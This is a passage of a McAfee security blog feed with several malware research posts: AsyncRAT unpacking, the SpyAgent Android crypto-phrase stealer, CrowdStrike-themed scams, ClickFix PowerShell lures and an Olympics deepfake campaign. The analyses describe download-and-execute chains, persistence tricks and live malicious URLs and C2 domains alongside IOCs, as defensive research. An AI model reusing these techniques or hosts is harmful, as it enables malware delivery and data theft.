  • Then, a long script is echoed at the end and piped for execution to PowerShell.
  • One interesting thing to note is that %~0 is echoed as part of the script and passed to PowerShell for execution. This trick passes the path of the bat script to the PowerShell script for further processing.
    

• • Difference b/w contents of %0 and %~0 variable, you can notice they only differ in double quotes.
    

• • Moving on to the PowerShell script, we can see it sets the PowerShell window title to the path of the bat script using the $host. UI.RawUI.WindowTitle call.
  • As we saw before, this path of bat script was passed to it during echo of %~0 environment variable in bat script.
  • Then we have some string replacement operations.
    

• • We can see the contents of the variable after the string replacement operation is done. It is being used to hide strings with malicious intent, such as invoke, load,frombase64string, etc.
  • Then we have a command to hide the PowerShell window
  • Then we have two functions. The first one is used for AES decryption, and the second one is used for Gzip decompression
  • Then, we have some operations that we will investigate in detail next.
  • Then we have two calls to System.reflection.assembly, which reflectively loads the assembly into memory.
    

• This is the deobfuscated and high-level view of the script for easy readability.

• • We can see that the $lmyiu variable contains the contents of the entire bat file. It reads using the System.IO.File call, which takes a parameter of the path supplied through [console]: Title. We know the title was set to the path of the original bat script at the beginning.
  • Now, indexes 5 and 6 are being read from the bat file, which translates to lines 5 and 6, which contain the comments (indexing starts from 0).
  • Now, the first two characters are removed using substring to remove the two colons (::) which represent a comment in the bat file
  • In the above image, we can see the output of that line, which contains the comment.
  • Now, the comment is converted from a base64 string and passed to a function that does AES decryption. The result is passed into a function that does GZIP decryption and stored in the assembly1 variable. The same thing happens for the second comment to get the second assembly.
  • Once both assemblies are decrypted, they are reflectively loaded into memory using the System.reflection.assembly call.
    

• We can dump the two decrypted assemblies onto the disk for further analysis, as shown in the above image.
• After writing to disk, we load both assemblies in CFF Explorer.

• Assembly1 in CFFExplorer.

• • Assembly2 in CFFExplorer.
    

• • We load both assemblies into Dnspy for further debugging.
  • We can see that both assemblies are heavily obfuscated using Confuser Packer, and their contents are not easily readable for analysis.

• This is intended to slow down the debugging process.
  
• We will use the .NET reactor slayer to deobfuscate the two assemblies. This will remove the confusing obfuscation and give us readable assemblies.
• We use it for both assemblies and write the deobfuscated versions to disk.

• When we load the assemblies into Dnspy, we see they have cleaned up nicely, and confuser obfuscation is entirely removed.
• We can see first it checks the console title of the current process.
• We can also see a few anti-debugging API calls, IsDebuggerPresent and CheckRemoteDebuggerPresent. If any of these calls return true, the program exists.
• After that, there is a call to smethod_3

• • Inspecting the smethod_3 function, we see some encrypted strings, all of which are being passed as arguments to the smethod_0 function.
    

• • By checking the smethod_0 function, we get the StringBuilder function, which will be used to convert the encoded strings into readable form.
    

• We put a breakpoint on the return call to see the decoded string being populated in the local window in case it is related to a scheduled task.

• Checking further, we get the call where the assembly is being written to disk in the appdata\Roaming folder with the name Network67895Man.cmd using the file.WriteAllBytes call. We can inspect the arguments in the local window.

• In the above image, we see that the Network67895Man.cmd file is being executed using the process. Start call.

• We can confirm that the hash of Network67895Man.cmd and our assembly are the same. We can also visually confirm that the file is in the appdata\roaming folder.

• Now that we see the persistence mechanism, we can see the return value of our string builder function related to the scheduled task.

• We copy the complete string and inspect it in Notepad++. We see that the PowerShell command is used to schedule a task named ‘OneNote 67895’. This will trigger At Logon, and the action is the execution of the Network67895Man.cmd file with some more parameters.

• • We can confirm the task being scheduled in the Task Scheduler window.
  • Moving on, see how the next stage is decrypted and loaded into memory
    

 

• One thing to observe here is that this assembly contains a resource named P, which turns out to contain the encrypted next-stage payload.

• • Dumping the resource onto disk and checking its content, we see the encrypted payload bytes starting from 1F 8B 08 00…
    

• In the local window, we can see the string P is being passed to the smethod_3 function, which will read the resource stream and the bytes of the P resource.

• We can confirm that the bytes have been read from the resource and can be seen in the local window in the result variable. We can see the same bytes, i.e., 1F 8B 08 00.

• Now, we put a breakpoint on the load call and inspect the contents of the raw assembly variable to see the decrypted payload.
• We dump it on the desk for further inspection.

• Checking it in CFF Explorer, we see this is also a 32-bit. net assembly file with internal name of stub.exe

• • Putting it in Dnspy, we can see an unobfuscated Asyncrat client payload named AsyncClient.
  • We can see all the functions in clear text, like Anti-analysis, Lime logger, mutex control, etc.
  • This is the final Asyncrat client payload that we have got after so many layers of the attack chain.We will now see some interesting features of the Asyncrat payload.
    

• • We can see it has its own persistence mechanism, which checks if the file is running as admin. If true, it creates a scheduled task by launching cmd.exe; otherwise, it creates a run key in the Windows registry for persistence.
    

• We can see the encrypted config of the Asyncrat client, including the port used, host, version, key, etc.

• We can see the decrypt method is called on each config parameter. In the above image, we have documented the Asyncrat CNC domain that it is using, orostros.mywire.org
• It turns out that this is a dynamic DNS service that the malware author is abusing to their advantage.

In conclusion, the rise of AsyncRAT and its distribution via masquerading as cracked software highlights the evolving tactics, techniques, and procedures (TTPs) employed by cybercriminals. By exploiting the lure of free software, these attackers are gaining unauthorized access to countless systems, jeopardizing sensitive information and digital assets.

Understanding these TTPs is crucial for anyone looking to protect themselves from such threats. However, awareness alone isn’t enough. To truly safeguard your digital presence, it’s essential to use reliable security solutions. McAfee antivirus software offers comprehensive protection against various threats, including malware like AsyncRAT. With real-time scanning, advanced threat detection, and continuous updates, McAfee ensures your devices remain secure from the latest cyber threats.

Don’t leave your digital assets vulnerable. Equip yourself with the right tools and stay one step ahead of cybercriminals. Your security is in your hands—make it a priority today.

The post Cracked Software or Cyber Trap? The Rising Danger of AsyncRAT Malware appeared first on McAfee Blog.

New Android SpyAgent Campaign Steals Crypto Credentials via Image Recognition

Authored by SangRyol Ryu

Recently, McAfee’s Mobile Research Team uncovered a new type of mobile malware that targets mnemonic keys by scanning for images on your device that might contain them. A mnemonic key is essentially a 12-word phrase that helps you recover your cryptocurrency wallets. It’s much simpler to remember than the typical complex “private key” it stands for.

This Android malware cleverly disguises itself as various trustworthy apps, ranging from banking and government services to TV streaming and utilities. However, once installed, these fake apps secretly gather and send your text messages, contacts, and all stored images to remote servers. They often distract users with endless loading screens, unexpected redirects, or brief blank screens to hide their true activities.

McAfee has identified over 280 fake applications involved in this scheme, which have been actively targeting users in Korea since January 2024. Thankfully, McAfee Mobile Security products are already on the lookout for this threat, known as SpyAgent, and are helping to keep your device safe from these deceptive tactics.

Figure 1 Timeline of this campaign

Distribution Mechanism

Mobile malware that targets users in Korea is mainly spread through clever phishing campaigns. These campaigns use text messages or direct messages on social media to send out harmful links. The attackers behind these messages often pretend to be organizations or people you trust, tricking you into clicking on their links. Once clicked, these links take you to fake websites that look incredibly real, mimicking the appearance of legitimate sites. These deceptive sites usually prompt you to download an app, which is how the malware gets installed on your device. Be cautious and always verify the authenticity of any message or link before clicking.

Figure 2 Fake Websites

When a user clicks on the download link, they are prompted to download an APK (Android Package Kit) file. Although this file appears to be a legitimate app, it is actually malicious software. Once the APK is downloaded, the user is asked to install the app. During installation, the app requests permission to access sensitive information such as SMS messages, contacts, and storage, and to run in the background. These permissions are often presented as necessary for the app to function properly, but in reality, they are used to compromise the user’s privacy and security.

Figure 3 App installation and requesting permissions

Malware Capabilities and Behavior

Once the app is installed and launched, it begins its main function of stealing sensitive information from the user and sending it to a remote server controlled by the attackers. The types of data it targets include:

• Contacts: The malware pulls the user’s entire contact list, which could be used for further deceptive practices or to spread the malware even further.
• SMS Messages: It captures and sends out all incoming SMS messages, which might include private codes used for two-factor authentication or other important information.
• Photos: The app uploads any images stored on the device to the attackers’ server. These could be personal photos or other sensitive images.
• Device Information: It gathers details about the device itself, like the operating system version and phone numbers. This information helps the attackers customize their malicious activities to be more effective.

The malware functions like an agent, capable of receiving and carrying out instructions from the remote server. These commands include:

• ‘ack_contact’: A confirmation signal that the server has received the contacts list.
• ‘ack_sms’: A confirmation signal that the server has received SMS messages.
• ‘ack_image’: A confirmation signal that the server has received images.
• ‘sound_mode_update’: A command that changes the sound settings of the device.
• ‘send_sms’: A command that enables the malware to send SMS messages from the device, which could be used to distribute phishing texts.

Command and Control Servers Investigation

During the investigation, the team discovered several key insights:

Insecure Command and Control Server: Several C2 servers were found to have weak security configurations, which allowed unauthorized access to specific index pages and files without needing credentials. This security lapse provided a deeper insight into the server’s functions and the types of data being gathered.

Upon examination, it was noted that the server’s root directory included multiple folders, each organized for different facets of the operation, such as mimicking banking institutions or postal services.

Figure 4 Exposed Indexing page of the root prior to the site being taken down

Due to the server’s misconfiguration, not only were its internal components unintentionally exposed, but the sensitive personal data of victims, which had been compromised, also became publicly accessible. In the ‘uploads’ directory, individual folders were found, each containing photos collected from the victims, highlighting the severity of the data breach.

Figure 5 Leaked images list from one of the victims of the ‘aepost’ campaign prior to the site being taken down

Admin Pages: Navigating from the exposed index pages led to admin pages designed for managing victims. These pages displayed a list of devices, complete with device information and various controllable actions. As the number of victims rises, the list of devices on these pages will expand accordingly.

Figure 6 Admin control panel

Targeting Cryptocurrency Wallets: Upon examining the page, it became clear that a primary goal of the attackers was to obtain the mnemonic recovery phrases for cryptocurrency wallets. This suggests a major emphasis on gaining entry to and possibly depleting the crypto assets of victims.

Figure 7 OCR details on Admin page

Data Processing and Management: This threat utilizes Python and Javascript on the server-side to process the stolen data. Specifically, images are converted to text using optical character recognition (OCR) techniques, which are then organized and managed through an administrative panel. This process suggests a high level of sophistication in handling and utilizing the stolen information.

Figure 8 Server-side OCR code

Evolution

Originally, the malware communicated with its command and control (C2) server via simple HTTP requests. While this method was effective, it was also relatively easy for security tools to track and block. In a significant tactical shift, the malware has now adopted WebSocket connections for its communications. This upgrade allows for more efficient, real-time, two-way interactions with the C2 server and helps it avoid detection by traditional HTTP-based network monitoring tools. This change also makes it more challenging for security researchers to analyze traffic and intercept malicious communications.

The malware has also seen substantial improvements in its obfuscation techniques, which further complicates detection efforts by security software and researchers. APK obfuscation now conceals malicious code using strategies like string encoding, the insertion of irrelevant code, and the renaming of functions and variables to confuse analysts. These methods not only create confusion but also delay the detection process, effectively masking the malware’s true operations.

Moreover, the malware’s application and targeting strategies have evolved. Recent observations indicate that the malware has adapted and begun to spread within the UK. This development is significant as it shows that the threat actors are expanding their focus both demographically and geographically. The move into the UK points to a deliberate attempt by the attackers to broaden their operations, likely aiming at new user groups with localized versions of the malware.

Conclusion

The continuous evolution of this malware highlights the ever-changing and sophisticated nature of cyber threats today. Initially masquerading as apps for money loans or government services, it has now adapted to exploit personal emotions by mimicking obituary notices. The research team has discovered that the perpetrators are utilizing OCR technology to analyze and misuse the stolen data for financial benefits. As the malware advances, employing more intricate methods, forecasting its next moves becomes increasingly challenging. Cybercriminals are constantly enhancing their tactics to better infiltrate and manipulate user environments, escalating the danger posed by these threats over time.

Although this malware is not widely prevalent, its impact intensifies when it leverages a victim’s contacts to send deceptive SMS messages. These phishing messages, seemingly sent by a familiar contact, are more likely to be trusted and acted upon by recipients. For instance, an obituary notice appearing to come from a friend’s number could be perceived as authentic, greatly raising the likelihood of the recipient engaging with the scam, especially compared to phishing attempts from unknown sources. This strategy introduces a deceptive layer that significantly enhances the effectiveness and stealthiness of the attack. Early detection of such malware is critical to prevent its proliferation, minimize potential harm, and curb further escalation. In response, the team has taken proactive steps by reporting the active URLs to the relevant content providers, who have promptly removed them.

The discovery of an item labeled “iPhone” in the admin panel indicates that the next stage of this malware’s development might target iOS users. While no direct evidence of an iOS-compatible version has been found yet, the possibility of its existence is genuine. Our team has previously documented data-stealing activities affecting both Android and iOS platforms, suggesting that the threat actors might be working on an iOS variant. This is particularly alarming because, despite iOS’s reputation for security, there are still methods for installing malicious apps outside of the App Store, such as through enterprise certificates and tools like Scalet. This potential shift to iOS highlights the need for vigilance across all mobile platforms.

In such a landscape, it is crucial for users to be cautious about their actions, like installing apps and granting permissions. It is advisable to keep important information securely stored and isolated from devices. Security software has become not just a recommendation but a necessity for protecting devices. The McAfee Mobile Research team continues to stay alert, implementing robust security measures to counter these advanced threats. McAfee Mobile Security products are designed to detect and defend against not only malware but also other unwanted software. For further details, please visit our McAfee Mobile Security website.

Indicators of Compromise

SHA256 Hash(es):

• 5b634ac2eecc2bb83c0403edba30a42cc4b564a3b5f7777fe9dada3cd87fd761
• 4cf35835637e3a16da8e285c1b531b3f56e1cc1d8f6586a7e6d26dd333b89fcf
• 3d69eab1d8ce85d405c194b30ac9cc01f093a0d5a6098fe47e82ec99509f930d
• 789374c325b1c687c42c8a2ac64186c31755bfbdd2f247995d3aa2d4b6c1190a
• 34c2a314dcbb5230bf79e85beaf03c8cee1db2b784adf77237ec425a533ec634
• f7c4c6ecbad94af8638b0b350faff54cb7345cf06716797769c3c8da8babaaeb
• 94aea07f38e5dfe861c28d005d019edd69887bc30dcc3387b7ded76938827528
• 1d9afa23f9d2ab95e3c2aecbb6ce431980da50ab9dea0d7698799b177192c798
• 19060263a9d3401e6f537b5d9e6991af637e1acb5684dbb9e55d2d9de66450f2
• 0ca26d6ed1505712b454719cb062c7fbdc5ae626191112eb306240d705e9ed23
• d340829ed4fe3c5b9e0b998b8a1afda92ca257732266e3ca91ef4f4b4dc719f8
• 149bd232175659434bbeed9f12c8dd369d888b22afaf2faabc684c8ff2096f8c
• f9509e5e48744ccef5bfd805938bf900128af4e03aeb7ec21c1e5a78943c72e7
• 26d761fac1bd819a609654910bfe6537f42f646df5fc9a06a186bbf685eef05b
• 0e778b6d334e8d114e959227b4424efe5bc7ffe5e943c71bce8aa577e2ab7cdb
• 8bbcfe8555d61a9c033811892c563f250480ee6809856933121a3e475dd50c18
• 373e5a2ee916a13ff3fc192fb59dcd1d4e84567475311f05f83ad6d0313c1b3b
• 7d346bc965d45764a95c43e616658d487a042d4573b2fdae2be32a0b114ecee6
• 1bff1823805d95a517863854dd26bbeaa7f7f83c423454e9abd74612899c4484
• 020c51ca238439080ec12f7d4bc4ddbdcf79664428cd0fb5e7f75337eff11d8a

Domain(s):

• ahd.lat 

• allsdy999.org 

• etr.lat 

• gf79.org 

• goodapps.top 

• gov24.me 

• gov24.top 

• krgoodapp.top 

• krgov24.top 

• like1902.xyz 

• make69.info 

• messtube999.info 

• mtube888.info 

• mylove777.org 

• oktube999.info 

• top1114.online 

• ytube888.info 

The post New Android SpyAgent Campaign Steals Crypto Credentials via Image Recognition appeared first on McAfee Blog.

The Scam Strikes Back: Exploiting the CrowdStrike Outage

Authored by Lakshya Mathur, Vallabh Chole & Abhishek Karnik

Recently we witnessed one of the most significant IT disruptions in history, affecting a wide range of sectors such as banking, airlines, and emergency services. At the heart of this disruption was CrowdStrike, known for its Falcon enterprise security solutions. The issue stemmed from a faulty security update that corrupted the Windows OS kernel, leading to a widespread Blue Screen of Death (BSOD).

The incident spurred opportunistic behaviors among scammers and malware creators. McAfee Labs noted:

• Non-Delivery Scams: Early signs of potential non-delivery scams shortly after the event, with some online stores quickly marketing merchandise that mocked the CrowdStrike incident.
• Domain Spoofing: A noticeable surge in domain registrations containing the term “CrowdStrike” following the onset of the outage, there was Scammers may register domain names to trick people into thinking the site is related to a legitimate or familiar company, to deceive users into visiting the site for phishing attacks, spreading malware, or collecting sensitive information.
• Malware: Malware developers swiftly disguised harmful software like Remcos, Wiper, and Stealers as remediation tools for the outage. Unsuspecting people may have downloaded this software in an effort to restore their systems.

Voice Scams: There were also reports of robocalls offering assistance for these issues, though these claims have not been verified by McAfee.

It’s important to note that Mac and Linux users were unaffected by this incident, as the problems were confined to Windows systems. Furthermore, since CrowdStrike primarily serves the enterprise market, the crashes predominantly affected business services rather than personal consumer systems. However, the ripple effects of the disruption may have caused inconvenience for consumers dealing with affected service providers, and all consumers should be extra vigilant regarding unsolicited communications from sources claiming to be an impacted business.

This blog outlines the various malware threats and scams observed since the outage occurred on Friday, July 19, 2024.

CrowdStrike Themed Malware

• Stealer payload via doc-based Macros

This file, which seems to provide recovery guidelines, covertly incorporates a macro that silently installs malware designed to steal information.

Malicious doc first page

Infection Chain

Zip -> Doc -> Cmd.exe -> Curl.exe -> Malicious URL -> Rundll32.exe -> Infostealer DLL payload

Doc file uses malicious macros, Curl.exe and Certutil.exe to download malicious infostealer DLL payload.

The stealer terminates all running Browser processes and then tries to steal login data and coolies from different browsers. All the stolen data is saved under %Temp% folder in a text file. This data is sent to the attacker’s C2 server.

• PDF file downloading Wiper Malware

Attackers use a PDF file and malicious spam to trick victims into downloading a supposed recovery tool. Clicking the provided link connects to a malicious URL, which then downloads a Wiper malware payload. This data wiper is extracted under %Temp% folder and its main purpose is to destroy data stored on the victim’s device.

PDF file with CrowdStrike remediation tool theme

Infection Chain

PDF -> Malicious URL -> Zip -> Wiper payload

• Remcos RAT delivered with CrowdStrike Fix theme

Zip files labeled “crowdstrike-hotfix.zip” that carry Hijack Loader malware, which then deploys Remcos RAT, have been observed being distributed to victims. Additionally, the zip file includes a text file with instructions on how to execute the .exe file to resolve the issue.

Remcos RAT allows attackers to take remote access to the victim’s machine and steal sensitive information from their system.

CrowdStrike Outage Impersonated Domains & URLs

Once the outage gained media attention, numerous domains containing the word “crowdstrike” were registered, aimed at manipulating search engine results. Over the weekend, several of these newly registered domains became active.

Here are some examples:

• Payment related domains

https[:]//pay.crowdstrikerecovery[.]com/ , pay[.]clown-strike[.]com , pay[.]strikeralliance[.]com

The rogue domains lead to the payments page

• Parked domains

Crowdstrike-helpdesk[.]com

Domains that are currently parked and not live

• Additionally, numerous cryptocurrency wallets were established using a theme inspired by CrowdStrike.

twitter[.]com/CrowdStrikeETH/

Some other wallets related to CrowdStrike Outage apart from above mentioned.

bitcoin:1M8jsPNgELuoXXXXXXXXXXXyDNvaxXLsoT

ethereum:0x1AEAe8c6XXXXXXXXXXX76ac49bb3816A4eB4455b

To summarize, the majority of consumers using devices at home might not be directly affected by this incident. However, if you have experienced issues such as airline delays, banking disruptions, healthcare, or similar service interruptions since July 19th, they could be related to this event.

Be wary if you receive phone calls, SMS messages, emails, or any form of contact offering assistance to remedy this situation. Unless you operate a business that uses CrowdStrike, you are likely not affected.

For the remediation process and steps follow the official article from CrowdStrike – https://www.crowdstrike.com/falcon-content-update-remediation-and-guidance-hub/

List of known malware hashes and potentially unwanted domains:

Hashes	Type
96dec6e07229201a02f538310815c695cf6147c548ff1c6a0def2fe38f3dcbc8	Wiper Zip
803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61	Stealer Docx
c44506fe6e1ede5a104008755abf5b6ace51f1a84ad656a2dccc7f2c39c0eca2	RemcosRAT Zip
19001dd441e50233d7f0addb4fcd405a70ac3d5e310ff20b331d6f1a29c634f0	Wiper PDF
d6d5ff8e9dc6d2b195a6715280c2f1ba471048a7ce68d256040672b801fda0ea	RemcosRAT DLL
4491901eff338ab52c85a77a3fbd3ce80fda738046ee3b7da7be468da5b331a3	Wiper EXE

 

Domains

hxxps://crowdstrike0day[.]com

hxxps://crowdstrikefix[.]com

hxxps://crowdstrike-bsod[.]com

hxxps://crowdstrikedoomsday[.]com

hxxps://crowdstrikedown[.]site

hxxps://www[.]crowdstriketoken[.]com

hxxps://crowdstriketoken[.]com

hxxps://crowdstrikebsod[.]com

hxxps://fix-crowdstrike-apocalypse[.]com

hxxp://crowdfalcon-immed-update[.]com

hxxp://crowdstrikefix[.]com

hxxp://fix-crowdstrike-apocalypse[.]com

hxxps://crowdstrike[.]phpartners[.]org

hxxps://www[.]crowdstrikefix[.]com

hxxp://crowdstrikebsod[.]com

hxxp://crowdstrikeclaim[.]com

hxxp://crowdstrikeupdate[.]com

hxxp://crowdstrike[.]buzz

hxxp://crowdstrike0day[.]com

hxxp://crowdstrike-bsod[.]com

hxxp://crowdstrikedoomsday[.]com

hxxp://crowdstrikedown[.]site

hxxp://crowdstrikefix[.]zip

hxxp://crowdstrike-helpdesk[.]com

hxxp://crowdstrikeoutage[.]info

hxxp://crowdstrikereport[.]com

hxxp://crowdstriketoken[.]com

hxxp://crowdstuck[.]org

hxxp://fix-crowdstrike-bsod[.]com

hxxp://microsoftcrowdstrike[.]com

hxxp://microsoftcrowdstrike[.]com/

hxxp://whatiscrowdstrike[.]com

hxxp://www[.]crowdstrikefix[.]com

 

The post The Scam Strikes Back: Exploiting the CrowdStrike Outage appeared first on McAfee Blog.

ClickFix Deception: A Social Engineering Tactic to Deploy Malware

Authored by Yashvi Shah and Vignesh Dhatchanamoorthy

McAfee Labs has discovered a highly unusual method of malware delivery, referred to by researchers as the “Clickfix” infection chain. The attack chain begins with users being lured to visit seemingly legitimate but compromised websites. Upon visiting, victims are redirected to domains hosting fake popup windows that instruct them to paste a script into a PowerShell terminal.

The “ClickFix” infection chain represents a sophisticated form of social engineering, leveraging the appearance of authenticity to manipulate users into executing malicious scripts. These compromised websites are often carefully crafted to look genuine, increasing the likelihood of user compliance. Once the script is pasted and executed in the PowerShell terminal, it allows the malware to infiltrate the victim’s system, potentially leading to data theft, system compromise, or further propagation of the malware.

We have observed malware families such as Lumma Stealer and DarkGate leveraging this technique. Here is the heatmap showing the distribution of users affected by the “Clickfix” technique:

Figure 1:Prevalence for the last three months

Darkgate ingesting via “ClickFix”

DarkGate is a sophisticated malware known for its ability to steal sensitive information, provide remote access, and establish persistent backdoors in compromised systems. It employs advanced evasion tactics and can spread within networks, making it a significant cybersecurity threat.
McAfee Labs obtained a phishing email from the spamtrap, having an HTML attachment.

Figure 2: Email with Attachment

The HTML file masquerades as a Word document, displaying an error prompt to deceive users. This tactic is used to trick users into taking actions that could lead to the download and execution of malicious software.

Figure 3: Displays extension problem issue

As shown, the sample displays a message stating, “The ‘Word Online’ extension is NOT installed in your browser. To view the document offline, click the ‘How to fix’ button.”

Before clicking on this button, let’s examine the underlying code. Upon examining the code, it was discovered that there were several base64-encoded content blocks present. Of particular significance was one found within the <Title> tag, which played a crucial role in this scenario.

Figure 4: HTML contains Base64-encoded content in the title tag

Decoding this we get,

Figure 5: After decoding the code

The decoded command demands PowerShell to carry out malicious activities on a system. It starts by downloading an HTA (HTML Application) file from the URL https://www.rockcreekdds.com/wp-content/1[.]hta and saves it locally as C:\users\public\Ix.hta.

The script then executes this HTA file using the start-process command, which initiates harmful actions on the system. Additionally, the script includes a command (Set-Clipboard -Value ‘ ‘) to clear the contents of the clipboard. After completing its tasks, the script terminates the PowerShell session with exit.

Upon further inspection of the HTML page, we found a javascript at the end of the code.

Figure 6: Decoding function snippet

This JavaScript snippet decodes and displays a payload, manages modal interactions for user feedback, and provides functionality for copying content to the clipboard upon user action.

In a nutshell, clicking on the “How to fix” button triggers the execution of JavaScript code that copies the PowerShell script directly onto the clipboard. This script, as previously discussed, includes commands to download and execute an HTA file from a remote server.

Let’s delve into it practically:

Figure 7: Clipboard contains malicious command

The attackers’ additional instruction to press Windows+R (which opens the Run dialog) and then press CTRL+V (which pastes the contents from the clipboard) suggests a social engineering tactic to further convince the user to execute the PowerShell script. This sequence of actions is intended to initiate the downloaded script (likely stored in the clipboard) without the user fully understanding its potentially malicious nature.

Once the user does this, the HTA file gets downloaded.

Figure 8: HTA code snippet

The above file attempts to connect to the marked domain and execute a PowerShell file from this malicious source. Given below is the malicious script that is stored remotely and executed.

Figure 9: Powershell code snippet

As this PowerShell script is executed implicitly without any user interaction, a folder is created in the C drive where an AutoIt executable and script are dropped and executed automatically.

Figure 10: Downloaded zip contains AutoIT script

Following this, DarkGate begins its malicious activity and starts communicating with its command and control (C2) server.

A similar Clickfix social engineering technique was found to be dropping Lumma Stealer.

Lumma Stealer ingesting via “ClickFix”

McAfee Labs discovered a website displaying an error message indicating that the browser is encountering issues displaying the webpage. The site provides steps to fix the problem, which are designed to deceive users into executing malicious actions.

Figure 11: Showing error on accessing the webpage

It directs the target user to perform the following steps:

1. Click on the “Copy Fix” button.
2. Right-click on the Windows icon.
3. Open Windows PowerShell (Admin).
4. Right-click within the open terminal window.
5. Wait for the update to complete.

Let’s analyze the code that gets copied when clicking the “Copy Fix” button.

Figure 12: Base64-encoded content

As we can see, the code includes base64-encoded content. Decoding this content, we get the following script:

Figure 13: After decoding the Base64 content

This PowerShell script flushes the DNS cache and then decodes a base64-encoded command to fetch and execute a script from a remote URL https://weoleycastletaxis.co.uk/chao/baby/cow[.]html, masquerading the request with a specific User-Agent header. The fetched script is then executed, and the screen is cleared to hide the actions. Subsequently, it decodes another base64 string to execute a command that sets the clipboard content to a space character. The script is likely designed for malicious purposes, such as downloading and executing remote code covertly while attempting to hide its activity from the user.

Upon execution, the following process tree flashes:

Figure 14: Process Tree

As we know it is downloading the malware from the given URL, a new folder is created in a Temp folder and a zip is downloaded:

Figure 15: Network activity

The malware is unzipped and dropped in the same folder:

Figure 16: Dropped files

The malware starts communicating with its C2 server as soon as it gets dropped in the targeted system.

Conclusion:

In conclusion, the Clickfix social engineering technique showcases a highly effective and technical method for malware deployment. By embedding base64-encoded scripts within seemingly legitimate error prompts, attackers deceive users into performing a series of actions that result in the execution of malicious PowerShell commands. These commands typically download and execute payloads, such as HTA files, from remote servers, subsequently deploying malware like DarkGate and Lumma Stealer.

Once the malware is active on the system, it begins its malicious activities, including stealing users’ personal data and sending it to its command and control (C2) server. The script execution often includes steps to evade detection and maintain persistence, such as clearing clipboard contents and running processes in minimized windows. By disguising error messages and providing seemingly helpful instructions, attackers manipulate users into unknowingly executing harmful scripts that download and run various kinds of malware.

Mitigations:

At McAfee Labs, we are committed to helping organizations protect themselves against sophisticated cyber threats, such as the Clickfix social engineering technique. Here are our recommended mitigations and remediations:

1. Conduct regular training sessions to educate users about social engineering tactics and phishing schemes.
2. Install and maintain updated antivirus and anti-malware software on all endpoints.
3. Implement robust email filtering to block phishing emails and malicious attachments.
4. Use web filtering solutions to prevent access to known malicious websites.
5. Deploy firewalls and intrusion detection/prevention systems (IDS/IPS) to monitor and block malicious network traffic.
6. Use network segmentation to limit the spread of malware within the organization.
7. Enforce the principle of least privilege (PoLP) to minimize user access to only necessary resources.
8. Implement security policies to monitor and restrict clipboard usage, especially in sensitive environments.
9. Implement multi-factor authentication (MFA) for accessing sensitive systems and data.
10. Ensure all operating systems, software, and applications are kept up to date with the latest security patches.
11. Continuously monitor and analyze system and network logs for signs of compromise.
12. Encrypt sensitive data both in transit and at rest to protect it from unauthorized access.
13. Regularly back up important data and store backups securely to ensure data recovery in case of a ransomware attack or data breach.

Indicators of Compromise (IoCs)

File	SHA256
DarkGate
Email	c5545d28faee14ed94d650bda28124743e2d7dacdefc8bf4ec5fc76f61756df3
Html	0db16db812cb9a43d5946911501ee8c0f1e3249fb6a5e45ae11cef0dddbe4889
HTA	5c204217d48f2565990dfdf2269c26113bd14c204484d8f466fb873312da80cf
PS	e9ad648589aa3e15ce61c6a3be4fc98429581be738792ed17a713b4980c9a4a2
ZIP	8c382d51459b91b7f74b23fbad7dd2e8c818961561603c8f6614edc9bb1637d1
AutoIT script	7d8a4aa184eb350f4be8706afb0d7527fca40c4667ab0491217b9e1e9d0f9c81
Lumma Stealer
URL	tuchinehd[.]com
PS	07594ba29d456e140a171cba12d8d9a2db8405755b81da063a425b1a8b50d073
ZIP	6608aeae3695b739311a47c63358d0f9dbe5710bd0073042629f8d9c1df905a8
EXE	e60d911f2ef120ed782449f1136c23ddf0c1c81f7479c5ce31ed6dcea6f6adf9

 

The post ClickFix Deception: A Social Engineering Tactic to Deploy Malware appeared first on McAfee Blog.

Olympics Has Fallen – A Misinformation Campaign Featuring a Voice Cloned Elon Musk

Authored by Lakshya Mathur and Abhishek Karnik

As the world gears up for the 2024 Paris Olympics, excitement is building, and so is the potential for scams. From fake ticket sales to counterfeit merchandise, scammers are on the prowl, leveraging big events to trick unsuspecting fans. Recently, McAfee researchers uncovered a particularly malicious scam that not only aims to deceive but also to portray the International Olympics Committee (IOC) as corrupt. 

This scam involves sophisticated social engineering techniques, where the scammers aim to deceive. They’ve become more accessible than ever thanks to advancements in Artificial Intelligence (AI). Tools like audio cloning enable scammers to create convincing fake audio messages at a low cost. These technologies were highlighted in McAfee’s AI Impersonator report last year, showcasing the growing threat of such tech in the hands of fraudsters. 

The latest scheme involves a fictitious Amazon Prime series titled “Olympics has Fallen II: The End of Thomas Bach,” narrated by a deepfake version of Elon Musk’s voice. This fake series was reported to have been released on a Telegram channel on June 24th, 2024. It’s a stark reminder of the lengths to which scammers will go to spread misinformation and exploit public figures to create believable narratives. 

As the Olympic Games approach, it’s crucial to stay vigilant and question the authenticity of sensational claims, especially those found on less regulated platforms like Telegram. Always verify information through official channels to avoid falling victim to these sophisticated scams. 

 As we approach the Olympic Games, it’s crucial to stay vigilant and question the authenticity of sensational claims, especially those found on less regulated platforms like Telegram. Always verify information through official channels to avoid falling victim to these sophisticated scams.

Cover Image of the series

This series seems to be the work of the same creator who, a year ago, put out a similar short series titled “Olympics has Fallen,” falsely presented as a Netflix series featuring a deepfake voice of Tom Cruise. With the Olympics beginning, this new release looks to be a sequel to last year’s fabrication. 

 

Image and Description of last year’s released series

 

These so-called documentaries are currently being distributed via Telegram channels. The primary aim of this series is to target the Olympics and discredit its leadership. Within just a week of its release, the series has already attracted over 150,000 viewers, and the numbers continue to climb. 

In addition to claiming to be an Amazon Prime story, the creators of this content have also circulated images of what seem to be fabricated endorsements and reviews from reputable publishers, enhancing their attempt at social engineering. 

Fake endorsement of famous publishers

This 3-part series consists of episodes utilizing AI voice cloning, image diffusion and lip-sync to piece together a fake narration. A lot of effort has been expended to make the video look like a professionally created series. However, there are certain hints in the video, such as the picture-in-picture overlay that appears at various points of the series. Through close observation, there are certain glitches 

Overlay video within the series with some discrepancies 

The original video appears to be from a Wall Street Journal (WSJ) interview that has then been altered and modified (noticed the background). The audio clone is almost indiscernible by human inspection. 

 

 

Original video snapshot from WSJ Interview

Modified and altered video snapshot from fake series 

 

Episodes thumbnails and their descriptions captured from the telegram channel

 

Elon Musk’s voice has been a target for impersonation before. In fact, McAfee’s 2023 Hacker Celebrity Hot List placed him at number six, highlighting his status as one of the most frequently mimicked public figures in cryptocurrency scams. 

